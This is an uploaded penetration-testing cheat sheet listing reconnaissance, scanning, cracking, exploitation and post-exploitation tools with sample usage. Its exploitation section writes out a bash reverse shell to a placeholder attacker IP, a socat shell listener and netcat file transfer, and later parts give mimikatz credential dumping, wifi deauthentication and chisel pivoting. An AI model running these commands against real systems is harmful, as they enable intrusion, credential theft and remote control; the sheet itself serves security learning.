Pentesting Command and Usage Details

The document provides a comprehensive list of commands and tools used in cybersecurity for reconnaissance, scanning, vulnerability analysis, exploitation, and post-exploitation. Each command is accompanied by usage examples and detailed descriptions of its functionalities. The tools range from DNS lookups and network scanning to password cracking and post-exploitation frameworks.

Uploaded by anjan log


I. Reconnaissance/Information Gathering

● whois <domain>
  ○ Usage: whois example.com
  ○ Details: Retrieves domain registration information, including registrant contact details, nameservers, and registration/expiration dates. Useful for identifying potential contacts or infrastructure.
● dig <domain> [record_type]
  ○ Usage: dig example.com A, dig example.com MX, dig example.com NS
  ○ Details: Performs DNS lookups.
    ■ A: Retrieves IPv4 addresses.
    ■ MX: Retrieves mail exchange records (email servers).
    ■ NS: Retrieves name server records.
    ■ Useful for mapping domain infrastructure and identifying mail servers.
● host <domain>
  ○ Usage: host example.com
  ○ Details: Simple DNS lookup utility that can resolve hostnames to IP addresses and vice versa.
● dnsenum <domain>
  ○ Usage: dnsenum example.com
  ○ Details: A Perl script that automates DNS enumeration, including zone transfers, reverse lookups, and brute-forcing subdomains.
● fierce -dns <domain>
  ○ Usage: fierce -dns example.com
  ○ Details: Another DNS reconnaissance tool, often used for finding non-contiguous IP space and hostnames.
● theHarvester -d <domain> -b all
  ○ Usage: theHarvester -d example.com -b all
  ○ Details: Gathers emails, subdomains, hosts, employee names, open ports, and banners from public sources (search engines, PGP servers, Shodan).
● maltego (GUI tool)
  ○ Details: A powerful graphical link analysis tool used for open-source intelligence (OSINT) and forensics. It can map relationships between people, domains, IPs, and more.
● whatweb <URL>
  ○ Usage: whatweb http://example.com
  ○ Details: Identifies web technologies used on a website, including CMS, web server, programming languages, and framework.
● nikto -h <URL>
  ○ Usage: nikto -h http://example.com
  ○ Details: A web server scanner that checks for known vulnerabilities, misconfigurations, outdated software, and common files/directories.

II. Scanning and Enumeration

● nmap (Network Mapper)
  ○ Basic Scan: nmap <target_IP> or nmap <target_domain> (Scans common ports)
  ○ Service Version Detection: nmap -sV <target_IP> (Detects service versions running on open ports)
  ○ OS Detection: nmap -O <target_IP> (Attempts to determine the operating system)
  ○ Aggressive Scan: nmap -A <target_IP> (Combines OS detection, version detection, script scanning, and traceroute)
  ○ Port Range Scan: nmap -p 1-65535 <target_IP> (Scans all 65535 TCP ports)
  ○ SYN Stealth Scan: nmap -sS <target_IP> (Performs a "stealthy" TCP SYN scan, often bypassing basic firewalls)
  ○ UDP Scan: nmap -sU <target_IP> (Scans for open UDP ports)
  ○ Script Scanning (NSE - Nmap Scripting Engine): nmap --script <script_name> <target_IP> (Runs specific Nmap scripts for vulnerability detection, enumeration, etc.)
    ■ Example Vulnerability Scan: nmap --script vuln <target_IP>
    ■ Example SMB Enumeration: nmap --script smb-enum-shares -p 445 <target_IP>
● netstat -tuln
  ○ Usage: netstat -tuln
  ○ Details: Displays active network connections and listening ports on the local system (Linux/Unix).
    ■ -t: TCP connections
    ■ -u: UDP connections
    ■ -l: Listening ports
    ■ -n: Numeric addresses (prevents DNS lookups)
● ss -tuln
  ○ Usage: ss -tuln
  ○ Details: A newer and often faster alternative to netstat for displaying socket statistics.
● enum4linux <target_IP>
  ○ Usage: enum4linux -a 192.168.1.100
  ○ Details: Enumerates information from Windows and Samba hosts, including users, groups, shares, and password policies.
● snmpwalk -v2c -c public <target_IP>
  ○ Usage: snmpwalk -v2c -c public 192.168.1.100
  ○ Details: Queries SNMP-enabled devices for system information, network interfaces, and other data (if the public community string is enabled).
● masscan <IP_range> -p<ports>
  ○ Usage: masscan 192.168.1.0/24 -p80,443,22
  ○ Details: A very fast network scanner capable of scanning large IP ranges quickly for specified ports.

III. Vulnerability Analysis

● searchsploit <software_name>
  ○ Usage: searchsploit apache
  ○ Details: Searches the local Exploit-DB repository for exploits related to a specific software or version.
● nessus / openvas (GUI/Web-based tools)
  ○ Details: Commercial (Nessus) and open-source (OpenVAS) vulnerability scanners that perform comprehensive scans for known vulnerabilities and misconfigurations. They provide detailed reports.
● nikto (as mentioned above)
● sqlmap -u <URL> --batch --crawl=1
  ○ Usage: sqlmap -u "http://example.com/?id=1" --batch --crawl=1
  ○ Details: Automates the detection and exploitation of SQL injection flaws and database takeover. --batch runs in non-interactive mode, --crawl can discover URLs.
● burpsuite (GUI tool, Community/Pro)
  ○ Details: A powerful integrated platform for web application security testing. Includes a proxy, scanner, intruder, repeater, and more. Used for intercepting, modifying, and analyzing HTTP traffic, and for finding various web vulnerabilities like XSS, SQLi, CSRF.

IV. Exploitation

● msfconsole (Metasploit Framework)
  ○ Usage: msfconsole (Launches the Metasploit console)
  ○ Details: A widely used penetration testing framework that provides a vast collection of exploits, payloads, and post-exploitation modules.
    ■ search <exploit_name>
    ■ use exploit/multi/handler
    ■ set PAYLOAD <payload_type>
    ■ set LHOST <your_IP>
    ■ set RHOSTS <target_IP>
    ■ exploit
● netcat (nc) / ncat
  ○ Listening for a shell (listener): nc -lvp 4444
  ○ Reverse shell (from target): bash -i >& /dev/tcp/<your_IP>/4444 0>&1
  ○ File transfer:
    ■ Sender: nc <receiver_IP> <port> < file.txt
    ■ Receiver: nc -lvp <port> > received_file.txt
● socat
  ○ Usage: socat tcp-listen:4444,reuseaddr exec:/bin/bash
  ○ Details: A powerful relay for various types of data streams, often used for creating stable reverse shells, port forwarding, and pivoting.
● hydra
  ○ Usage: hydra -l admin -P passwords.txt ssh://192.168.1.1
  ○ Details: A fast and flexible brute-force tool that supports numerous protocols (SSH, FTP, HTTP, SMB, etc.).
● john (John the Ripper)
  ○ Usage: john --wordlist=rockyou.txt hashes.txt
  ○ Details: A powerful password cracking tool that supports various hash types and cracking modes (dictionary, brute-force, jumbo).
● hashcat
  ○ Usage: hashcat -m 0 -a 0 hashes.txt passwords.txt
  ○ Details: A highly optimized and feature-rich password cracker that supports GPU acceleration and a wide array of hash types and attack modes.
● aircrack-ng suite (for wireless attacks)
  ○ airmon-ng start wlan0
  ○ airodump-ng wlan0mon
  ○ aireplay-ng -0 10 -a <BSSID> wlan0mon
  ○ aircrack-ng -w wordlist.txt capture.cap

V. Post-Exploitation

● Basic Linux/Windows Commands (depending on the target OS):
  ○ Linux: pwd, ls, cd, cat, grep, find, whoami, id, uname -a, ps aux, history, sudo -l, ip a, netstat -tuln
  ○ Windows: whoami, ipconfig, netstat -ano, tasklist, dir, cd, type, systeminfo, net user, net localgroup
● mimikatz (Windows)
  ○ Usage: ./mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"
  ○ Details: Extracts plaintext passwords, hash values, PIN codes, and Kerberos tickets from memory.
● powershell-empire (Windows)
  ○ Details: A post-exploitation framework specifically designed for Windows environments, enabling various actions like privilege escalation, credential dumping, and persistence.
● chisel
  ○ Usage: ./chisel server -p 8000 --reverse
  ○ Usage: ./chisel client <attacker_IP>:8000 R:22:<target_internal_IP>:22
  ○ Details: A fast TCP/UDP tunnel that can be used for pivoting into internal networks.
● proxychains
  ○ Usage: proxychains nmap -sT -Pn example.com
  ○ Details: Forces any TCP connection made by a program to go through a proxy (e.g., SOCKS5, HTTP, Tor). Useful for anonymizing traffic or reaching internal networks through a pivot.
● Reverse Shell One-Liners: Various one-liners in Bash, Python, Perl, PHP, Ruby, Netcat (without -e), etc., are used to establish a reverse shell connection back to the attacker's listener.
